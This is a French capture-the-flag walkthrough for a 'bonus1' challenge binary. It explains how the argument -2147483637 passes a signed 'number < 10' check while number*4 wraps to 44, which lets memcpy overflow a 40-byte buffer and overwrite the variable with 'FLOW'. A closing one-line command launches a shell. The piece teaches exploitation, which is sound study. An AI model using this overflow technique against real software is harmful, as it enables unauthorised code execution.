# Bonus1 - Integer Overflow Walkthrough : D'où vient -2147483637 ?

## Le Problème
```c
number = atoi(argv[1]);
if (number < 10) {
    memcpy(buffer, argv[2], number * 4);  // Copie number*4 bytes
    if (number == 0x574f4c46) {           // "FLOW" en little-endian
        execl("/bin/sh", "sh", 0);
    }
}
```

## L'Objectif
- Copier **44 bytes** pour déborder le buffer[40] et écraser la variable `number`
- Avoir `number < 10` pour passer la première vérification
- Écraser `number` avec "FLOW" pour déclencher le shell

## La Solution : Integer Overflow
1. **On veut** : `number * 4 = 44` → donc `number = 11`
2. **Problème** : `11 > 10` ❌
3. **Astuce** : Utiliser un nombre négatif qui donne le même résultat !

### Comment Trouver -2147483637 ?

**Méthode simple :** INT_MIN + la valeur qu'on veut

```python
INT_MIN = -2147483648  # Plus petit entier 32-bit
number = INT_MIN + 11 # 11 est la valeur qu'on veut simuler
# Résultat : -2147483637
```

**Pourquoi ça marche ?**
En 32-bit, -2147483637 se "comporte" comme 11 à cause de l'overflow !

### Le Calcul
```python
# Calcul normal (ce que Python fait) :
11 * 4 = 44
-2147483637 * 4 = -8589934548  # Résultat différent !

# Mais en 32-bit (ce que fait le processeur) :
11 * 4 = 44
(-2147483637 * 4) & 0xFFFFFFFF = 44  # Même résultat !

# Pourquoi ? L'overflow 32-bit "coupe" les bits excédentaires :
# 0xFFFFFFFF = masque qui garde seulement les 32 bits de poids faible
# -8589934548 & 0xFFFFFFFF = 44

# Vérification
number = -2147483637
print(f"{number} < 10: {number < 10}")  # True ✅
print(f"Python complet: {number * 4}")  # -8589934548
print(f"Processeur 32-bit: {(number * 4) & 0xFFFFFFFF}")  # 44 ✅
```

## L'Exploit
```bash
./bonus1 -2147483637 $(python -c 'print("A"*40 + "FLOW")')
```

**Résultat** : `memcpy` copie 44 bytes, écrase `number` avec "FLOW", et lance le shell ! 🚀